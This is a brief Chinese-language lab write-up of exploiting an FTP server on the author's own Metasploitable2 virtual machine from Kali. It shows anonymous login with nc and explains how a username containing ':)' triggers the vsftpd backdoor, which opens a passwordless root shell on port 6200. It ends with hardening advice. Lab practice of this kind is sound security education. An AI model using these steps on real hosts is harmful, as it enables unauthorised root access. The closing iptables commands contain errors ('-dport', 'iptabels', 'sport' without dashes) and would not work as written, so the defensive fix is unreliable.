一、環境說明
目標IP: 本人虛擬機 192.168.80.134 ,使用 metasploit2
攻擊IP: 本人虛擬機 192.168.80.129 ,使用 kali
二、匿名用戶登錄
root@kali:~# nc 192.168.80.134 21
USER anonymous
331 Please specify the password.
PASS 123 #密碼任意
HELP 可以成功登錄
三、FTP 后門漏洞
vsftpd手工出發漏洞:當進行FTP認證時,如果用戶名USER中包含:),那么直接就觸發監聽6200端口的連接的shell。
默認6200端口並未開放
root@kali:~# nmap -p 6200 192.168.80.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 09:15 CST
Nmap scan report for 192.168.80.134
Host is up (0.00098s latency).
PORT STATE SERVICE
6200/tcp closed lm-x
打開另一個終端窗口,現在6200已被觸發打開,並且登錄該端口已經是root並且不需要密碼,值得注意的是,默認FTP有個TIMEOUT時間
四、FTP漏洞加固
1、修改配置文件,禁止匿名用戶登錄。
2、對特定漏洞進行打補丁,或者設置防火牆禁止連接后門端口。
iptables -A INPUT -p tcp -dport 6200 -j DROP
iptabels -A OUTPUT -p tcp sport 6200 -j DROP